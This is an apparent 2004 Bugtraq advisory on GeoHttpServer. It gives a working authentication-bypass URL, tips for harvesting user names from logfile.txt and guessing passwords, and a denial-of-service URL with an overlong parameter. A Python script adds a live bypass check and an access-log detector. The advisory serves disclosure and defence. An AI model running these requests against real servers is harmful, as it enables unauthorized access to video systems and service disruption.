GeoHttpServer Authentication Bypass Vulnerability & DoS (Denial of Service)

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/22/04

    To: "bugtraq" <bugtraq@securityfocus.com>
    Date: Thu, 22 Jan 2004 19:23:16 +0200
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Software: GeoHttpServer
    Vendor: GEOVISION INC
                            http://www.geovision.com.tw
    Versions: ALL
    Platforms: Unix
    Bug: Authentication Bypass Vulnerability & DoS (Denial of Service)
    Risk: High
    Exploitation: Remote with browser
    Date: 22 Jan 2004
    Author: Rafel Ivgi, The-Insider
    e-mail: the_insider@mail.com
    web: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bug
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    GeoHttpServer is the web server component shipped by GEOVISION INC
    (http://www.geovision.com.tw). It streams video (JPEG or GIF) to a browser
    and, when configured to do so, puts a login form in front of its main page
    and its server information/configuration pages.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    Authentication is optional in GeoHttpServer. Administrators who know what
    they are doing configure the server to require a login, and it then serves
    the following form instead of the main page:
    **********************************************
    <html><head><title>Login In</title>
    </head><body><center>
    <form method="POST" action="phoneinfo">User Name:</BR>
      <input type="id" name="id" size="10"><p></p>
      Password:</BR>
      <input type="password" name="pwd" size="10">
      <p><input type="radio" name="ImageType" value="1" checked>JPEG&nbsp;
      <input type="radio" name="ImageType" value="2">GIF</p>
      <p><input type="submit" name="send" value="Submit"><input type="reset"
    name="CANCEL" value="Cancel"></center><center><br>
      </p>
    </form>
    </center>
    </body>
    </html>
    **********************************************

    Requesting http://<host>/%0a%0a (a path consisting of two percent-encoded
    line feeds) bypasses the form: the server answers with its default main
    page instead of the login page.

    The main page leads to functions that also require authentication. To
    obtain a valid user name, fetch
    http://<host>/logfile.txt
    which generally contains the last logins and the user names used. In most
    cases the password is the same as the user name.

    In addition, there is an authentication form inside the server that
    requires a name and a password before it shows the server info/config
    pages (the sysinfo resource). Manipulating the parameters of that link
    crashes the server: an overlong pwd value causes a denial of service.

    P.O.C (Proof of Concept); the pwd value is one continuous run of "a"
    characters, wrapped here for the mail:
    http://<host>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaa

    A second DoS is against the client rather than the server: when someone
    is watching a video stream from the server in Internet Explorer and presses
    the reconnect button, IE crashes with an overflow in msxml3.dll.
    Internet Explorer version: 6.0.2600.0
    Faulting module: msxml3.dll
    Module version: 8.20.9415.0
    Offset: 00013ed6

    http://theinsider.deep-ice.com/

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    Authentication bypass:
    http://<host>/%0a%0a
    Denial of service (pwd is one continuous run of "a" characters, wrapped
    here for the mail):
    http://<host>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaa
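    The advisory gives the two URLs but no tooling around them. The script
    below is an added example written for this page, not code from the
    advisory author or from GeoVision. It does three things: builds the raw
    bypass request so the %0a%0a path reaches the server unchanged, classifies
    the response by looking for the vendor login form markers quoted in
    section 2, and flags both attack patterns in an access log. The live check
    sends only the harmless bypass path, never the DoS URL. Assumptions are
    labelled in the code: <host>/port are placeholders, the 64-character
    parameter threshold is arbitrary (the vendor's real limit is unknown), and
    the combined-log-style lines are constructed, since the advisory does not
    document the format of GeoHttpServer's own logfile.txt. The advisory does
    not say why the bypass works; one explanation consistent with it is that
    the server percent-decodes the path before matching it against protected
    resources, so the decoded "/\n\n" matches nothing and falls through to
    the default page.

```python
"""Check and detection for the GeoHttpServer issues in this advisory.
Added example, not GeoVision's or the advisory author's code."""
import re
import socket
from urllib.parse import parse_qs, unquote, urlsplit

# Markers taken from the login form the server sends (quoted in section 2).
LOGIN_FORM_MARKERS = ('action="phoneinfo"', 'name="pwd"', 'type="password"')
BYPASS_PATH = "/%0a%0a"   # the advisory's bypass path

# Constructed bodies used for offline testing of the classifier.
SAMPLE_LOGIN_FORM = ('<form method="POST" action="phoneinfo">'
                     '<input type="id" name="id">'
                     '<input type="password" name="pwd"></form>')
SAMPLE_MAIN_PAGE = "<html><head><title>GeoHttpServer</title></head><body>Main</body></html>"


def looks_like_login_form(body):
    """True when a response body is the vendor login form."""
    return all(marker in body for marker in LOGIN_FORM_MARKERS)


def http_get(host, path, port=80, timeout=5.0):
    """Raw HTTP/1.0 GET so the path reaches the server byte-for-byte
    (a URL library could re-encode or normalise the %0a%0a path)."""
    request = f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while chunk := sock.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks).decode("latin-1")


def classify(root_body, bypass_body):
    """Compare the response for '/' with the response for '/%0a%0a'."""
    if not looks_like_login_form(root_body):
        return "no-auth"          # login not enabled, nothing to bypass
    if looks_like_login_form(bypass_body):
        return "not-vulnerable"   # still challenged on the odd path
    return "bypass"               # main page served without credentials


def check_host(host, port=80):
    """Live check against a target; only the bypass path is sent."""
    return classify(http_get(host, "/", port), http_get(host, BYPASS_PATH, port))


def suspicious_target(target, max_param_len=64):
    """Reasons a request target matches either attack pattern.
    max_param_len is an assumed threshold, not a documented vendor limit."""
    reasons = []
    parts = urlsplit(target)
    decoded_path = unquote(parts.path)
    if "\n" in decoded_path or "\r" in decoded_path:
        reasons.append("control-char-in-path")
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if any(len(v) > max_param_len for v in values):
            reasons.append(f"overlong-param:{name}")
    return reasons


# Combined-log-style request field; this format is constructed for the
# example, GeoHttpServer's own logfile.txt layout is not in the advisory.
LOG_LINE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/\d\.\d"')


def scan_access_log(lines):
    """Return (line number, target, reasons) for each flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = LOG_LINE.search(line)
        if not match:
            continue
        reasons = suspicious_target(match.group("target"))
        if reasons:
            hits.append((number, match.group("target"), reasons))
    return hits


SAMPLE_LOG = [  # constructed lines mirroring the advisory's two requests
    '10.0.0.5 - - [22/Jan/2004:19:23:16 +0200] "GET / HTTP/1.0" 200 612',
    '10.0.0.5 - - [22/Jan/2004:19:23:20 +0200] "GET /%0a%0a HTTP/1.0" 200 4120',
    '10.0.0.5 - - [22/Jan/2004:19:23:31 +0200] "GET /sysinfo?id=TheInsider&pwd=killed'
    + "a" * 500 + ' HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for number, target, reasons in scan_access_log(SAMPLE_LOG):
        print(number, reasons, target[:40])
```

    Run it as-is to see the two constructed log lines flagged; call
    check_host("<host>") against a lab instance to test the bypass. The
    classifier compares the two responses rather than looking for a fixed
    main page, so a server with authentication switched off is reported as
    "no-auth" instead of being mistaken for a bypass.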

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com
    "Things that are unlikeable, are NOT impossible."
    
